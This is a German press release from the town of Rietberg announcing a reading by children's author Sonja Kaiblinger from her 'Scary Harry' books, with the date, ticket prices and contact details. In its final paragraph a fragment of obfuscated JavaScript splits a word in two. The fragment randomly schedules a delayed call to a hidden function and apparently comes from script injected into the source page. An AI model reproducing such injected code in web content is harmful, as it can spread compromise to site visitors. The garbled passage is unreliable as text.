Autorin Sonja Kaiblinger liest aus „Scary Harry“

Ein wenig schaurig, mit Sicherheit auch gruselig, aber immer kindgerecht – die Bücherreihe „Scary Harry“ von Kinder- und Jugendbuchautorin Sonja Kaiblinger ist bei Nachwuchslesern beliebt. Jetzt kommt die Schöpferin der Scary-Harry-Geschichten nach Rietberg. Am Mittwoch, 4. November, liest sie ab 17 Uhr in der Cultura. Die Veranstaltung wird von der Rietberger Stadtbibliothek in Zusammenarbeit mit dem Verein kulturig organisiert.

Im Gepäck hat Kaiblinger das erste Abenteuer des schrägen und sympathischen Knochenmanns Scary Harry. In „Von allen guten Geistern verlassen“ begegnet der elfjährige Otto dem Sensenmann Harold und begibt sich mit ihm und Ottos bester Freundin Emily auf die Suche nach seinen entführten Hausgeistern. Die Lesung ist für Kinder ab neun Jahren geeignet. Sonja Kaiblinger wird nicht nur lesen, sondern auch von ihrem Leben als Autorin berichten und erklären, wie sie auf die Ideen für ihre Geschichten kommt und wie daraus richtige Bücher werden. Im Anschluss ist Zeit für Fragen der jungen Besucher. Alle Fans bekommen die Möglichkeit, sich ein Autogramm zu sichern. Karten für die Veranstaltung (3,90 Euro im Vorverkauf) gibt es unter www.kulturig.com  und bei allen bekannten Vorverkaufsstellen. An der Abendkasse kostet eine Karte fünf Euro. Die Abstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands- und Hygieneregeln werden während der Veranstaltung selbstverständlich eingehalten.

Weitere Informationen und Kartenvorbestellungen bei der Touristikinformation der Stadt Rietberg unter Telefon 05244/986-100, per E-Mail an kulturig@stadt-rietberg.de oder im Internet auf www.kulturig.com.

Quelle: Stadt Rietberg